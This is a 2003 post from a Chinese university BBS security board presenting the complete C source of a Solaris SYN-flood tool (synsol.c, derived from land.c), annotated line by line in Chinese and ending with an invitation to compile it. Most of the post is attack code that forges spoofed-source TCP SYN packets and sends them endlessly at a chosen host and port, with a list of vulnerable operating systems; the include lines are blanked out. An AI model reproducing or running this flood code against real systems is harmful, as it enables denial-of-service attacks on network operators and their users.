荔园在线

荔园之美,在春之萌芽,在夏之绽放,在秋之收获,在冬之沉淀

[回到开始] [上一篇][下一篇]

发信人: hellsolaris (qq), 信区: Security
标  题: 一个SYN攻击的代码分析
发信站: 荔园晨风BBS站 (Sat Oct 25 17:53:02 2003), 站内信件

这是一个SYN攻击的源程序:

大家试着读一读,看是否能读懂,不懂可以给我留言。

我加的有中文注释。

/* Syn Attack against a port for Solaris */

/* Original land attack, land.c by m3lt, FLC */

/* Ported to 44BSD by blast and jerm */

/* Ported to Solaris by ziro antagonist */

/* Referenced flood.c by unknown author */

/* Converted into a syn attack against one port by CRG */

/* Please use this for educational purposes only */

/* Compiles on Solaris gcc -o synsol synsol.c -lsocket -lnsl */

/* Additional notes: */

/* Successfully compiled on Solaris 2.51 and 2.6 */

/* Runs: synsol    */

/* */

/* Tested it on: Solaris 2.6 */

/* */

/* Attacked against: */

/* Linux 2.0.33 - vulnerable */

/* Linux 2.0.30 - vulnerable */

/* Linux 1.2.13 - vulnerable */

/* Solaris 2.4 - vulnerable */

/* Solaris 2.5.1 - vulnerable */

/* SunOS 4.1.3_U3 - vulnerable */

/* Solaris 2.6 - not vulnerable */

/* */

/* Most of these test machines are not patched because they */

/* are in test lab. I tested the program against port 23 and */

/* every once in awhile I did get through. */

/* */

/* Direct any comments, questions, improvements to */

/* packetstorm@genocide2600.com */

/* http://www.genocide2600.com/~tattooman/ */

/* Your emails will be forwarded to the author, who wishes */

/* to remain known only as CRG (no email addy or URL) */

/*jjgirl:上面的注释的不用说了!*/

#include

#include

#include

#include

#include

#include

#include

#include

#include

#include

#include

#include

#include

#include

#include

#include

/*jjgirl:上面是头文件!*/



unsigned long srcport;



struct pseudohdr

{

struct in_addr saddr;

struct in_addr daddr;

u_char zero;

u_char protocol;

u_short length;

struct tcphdr tcpheader;

};

/*jjgirl:定义一个伪装地址的结构!*/



u_short checksum(u_short * data,u_short length)

{

int nleft = length;

int sum=0;

unsigned short *w = data;

unsigned short value = 0;



while (nleft > 1) {

sum += *w++;

nleft -= 2;

}



if (nleft == 1) {

*(unsigned char *) (&value) = *(unsigned char *) w;

sum += value;

}

sum = (sum >>16) + (sum & 0xffff);

sum += (sum >> 16);

value = ~sum;

return(value);

}

/*jjgirl:上面校验文件!包头是需要校验的,CRC校验!*/





int main(int argc,char * * argv)

{/*jjgirl:主程序开始了!*/

struct sockaddr_in sin;

struct sockaddr_in din;

struct hostent * hoste;

struct hostent * host1;

int j,sock,foo, flooddot=1;

char buffer[40];

struct ip * ipheader=(struct ip *) buffer;

struct tcphdr * tcpheader=(struct tcphdr *) (buffer+sizeof(struct ip));

struct pseudohdr pseudoheader;

/*jjgirl:上面定义变量!*/



fprintf(stderr,"Syn attack against one port.(Infinite)\n");



if(argc<4)

{

fprintf(stderr,"usage: %s   \n",argv[0]);

return(-1);

}

/*jjgirl:上面是判断参数!*/

fprintf(stderr,"%s:%s is being syn'd attacked by %s.\n",argv[1],argv[2]
,argv[3]);
bzero(&sin,sizeof(struct sockaddr_in)); /*write sizeof to &sin*/
sin.sin_family=AF_INET;

if((host1=gethostbyname(argv[3]))!=NULL)

bcopy(host1->h_addr,&din.sin_addr,host1->h_length);

else if((din.sin_addr.s_addr=inet_addr(argv[3]))==-1)

{

fprintf(stderr,"unknown source host %s\n",argv[3]);

return(-1);

}

if((hoste=gethostbyname(argv[1]))!=NULL)

bcopy(hoste->h_addr,&sin.sin_addr,hoste->h_length);

else if((sin.sin_addr.s_addr=inet_addr(argv[1]))==-1)

{

fprintf(stderr,"unknown destination host %s\n",argv[1]);

return(-1);

}



if((sin.sin_port=htons(atoi(argv[2])))==0)

{

fprintf(stderr,"unknown port %s\n",argv[2]);

return(-1);

}

/*jjgirl:上面是给sockaddr_in结构赋值,需要指明协议,端口号!*/







if((sock=socket(AF_INET,SOCK_RAW,255))==-1)

{

fprintf(stderr,"couldn't allocate raw socket\n");

return(-1);

}

/*jjgirl:上面开始Socket了!*/



foo=1;

if(setsockopt(sock,0,IP_HDRINCL,(char *)&foo,sizeof(int))==-1)

{

fprintf(stderr,"couldn't set raw header on socket\n");

return(-1);

}

/*jjgirl:上面是为了重构报头!*/



for(j=1;j>0;j++)

{

bzero(&buffer,sizeof(struct ip)+sizeof(struct tcphdr));

ipheader->ip_v=4;

ipheader->ip_tos=0;

ipheader->ip_hl=sizeof(struct ip)/4;

ipheader->ip_len=sizeof(struct ip)+sizeof(struct tcphdr);

ipheader->ip_id=htons(random());

ipheader->ip_ttl=30; /*255;*/

ipheader->ip_p=IPPROTO_TCP;

ipheader->ip_sum=0;

ipheader->ip_src=din.sin_addr;

ipheader->ip_dst=sin.sin_addr;



tcpheader->th_sport=htons(srcport); /*sin.sin_port;*/

tcpheader->th_dport=sin.sin_port;

tcpheader->th_seq=htonl(0x28374839);

tcpheader->th_flags=TH_SYN;

tcpheader->th_off=sizeof(struct tcphdr)/4;

tcpheader->th_win=htons(2048);

tcpheader->th_sum=0;



bzero(&pseudoheader,12+sizeof(struct tcphdr));

pseudoheader.saddr.s_addr=din.sin_addr.s_addr;

pseudoheader.daddr.s_addr=sin.sin_addr.s_addr;

pseudoheader.protocol=6;

pseudoheader.length=htons(sizeof(struct tcphdr));

bcopy((char *) tcpheader,(char *) &pseudoheader.tcpheader,sizeof(struct
 tcphdr));
tcpheader->th_sum=checksum((u_short *) &pseudoheader,12+sizeof(struct
 tcphdr));

/*jjgirl:上面是重构报头!*/



srcport= (10000.0*random()/(15000+1.0));

/*jjgirl:端口当然要变!*/



if(sendto(sock,buffer,sizeof(struct ip)+sizeof(struct tcphdr),0,(struct
 sockaddr *) &sin,sizeof(struct sockaddr_in))==-1)
/*jjgirl:攻击开始!*/

{

fprintf(stderr,"couldn't send packet,%d\n",errno);

return(-1);

}

usleep(2);

if (!(flooddot = (flooddot+1)%(1)))

{fprintf(stdout,".");fflush(stdout);}



/*jjgirl:显示次数! Jjgirl 把上面一句,改为如下两句,增加显示效果,随你的便

{fprintf(stdout,".%4d",j);fflush(stdout);}

int k=j; if((k%10)==0) printf("\n"); */



} /*The end of the infinite loop*/

close(sock);

return(0);

}

/*jjgirl:结束!编译试试吧!如果有看不懂可以给我留言,或来信jjgirl@263.net,或复
  习前面的课程!*/
/*jjgirl:若有人引用本文,请事先通知,并请保持完整性!*/

--
※ 来源:·荔园晨风BBS站 bbs.szu.edu.cn·[FROM: 192.168.44.223]

[回到开始] [上一篇][下一篇]

荔园在线首页 友情链接:深圳大学 深大招生 荔园晨风BBS S-Term软件 网络书店